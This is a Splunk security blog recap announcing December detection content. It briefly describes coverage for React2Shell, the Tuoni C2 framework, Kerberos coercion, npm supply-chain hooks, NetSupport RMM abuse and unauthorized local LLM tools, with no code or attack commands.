Splunk Security Content for Threat Detection & Response: December Recap

In December, the Splunk Threat Research Team had 1 release of new security contentvia the Enterprise Security Content Update (ESCU) app (v5.19). With this release, there are 6 new analytic stories and 31 new analytics now available in Splunk Enterprise Security via the ESCU application update process.

Content Highlights Include:

This release advances the Splunk + Cisco Better Together strategy with the largest expansion of Cisco ASA security analytics to date, exposing configuration tampering, logging suppression, packet capture abuse, identity manipulation, and reconnaissance activity on firewall infrastructure. Together, these updates help customers detect high-impact threats earlier, reduce blind spots across modern enterprise environments, and strengthen SOC effectiveness through unified, high-confidence detections. In addition, this release also adds the following coverage:

• React2Shell (CVE-2025-55182): Introduced a new analytic story, React2Shell, addressing the critical pre-authentication Remote Code Execution (RCE) vulnerability in React Server Components. This vulnerability affects React versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, as well as Next.js 15.x and 16.x versions using the App Router. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints, allowing attackers to execute arbitrary JavaScript code on the server without authentication.

• Tuoni C2 Framework: Introduced a new analytic story addressing threats from the Tuoni command-and-control framework, a sophisticated cross-platform red teaming tool increasingly adopted by threat actors for real-world attacks. Tuoni enables adversaries to deploy malicious payloads directly into system memory, bypassing traditional disk-based detection mechanisms. Its modular design supports multiple attack variations and allows operators to maintain persistence and execute commands across Windows, Linux, and macOS environments without leaving significant forensic artifacts.

• Kerberos Coercion with DNS (CVE-2025-33073): A new analytic story addressing CVE-2025-33073. These analytics identify coercion attempts where attackers leverage DNS records to trigger Kerberos authentication from remote hosts, a technique that can lead to credential relay or domain privilege escalation.

• NPM Supply Chain Compromise (Shai-Hulud Campaigns):Expanded detection coverage for npm ecosystem supply chain compromises, addressing both the Shai-Hulud 2.0 worm campaign and recurring lifecycle hook abuse patterns. This update adds analytics to detect malicious npm package installations that execute arbitrary scripts through preinstall, install, postinstall, or prepare hooks; a long-standing risk vector exploited in major incidents from event-stream (2018) to ua-parser-js (2021) and Shai-Hulud (2025).

• NetSupport RMM Tool Abuse:Strengthened detection coverage for malicious use of the NetSupport Manager RMM tool, which adversaries frequently deploy for covert remote access under the guise of legitimate remote-support activity. New analytics identify NetSupport’s presence through loaded module patterns, executable masquerading, and registry manipulation, including detections for Windows Deletion of Most Recent Used Command via Registry, Executable Masquerading as Benign File Types, and NetSupport RMM Loaded Modules.

• Suspicious Local LLM Frameworks:Added new analytics to address the rise of Shadow AI, unauthorized deployment of local Large Language Model (LLM) frameworks such as Ollama, LM Studio, GPT4All, Jan, llama.cpp, and KoboldCPP inside enterprise environments. These tools allow users to run powerful models locally, creating blind spots for data exfiltration, policy violations, and unmonitored processing of sensitive information.

For all our tools and security content, please visit research.splunk.com.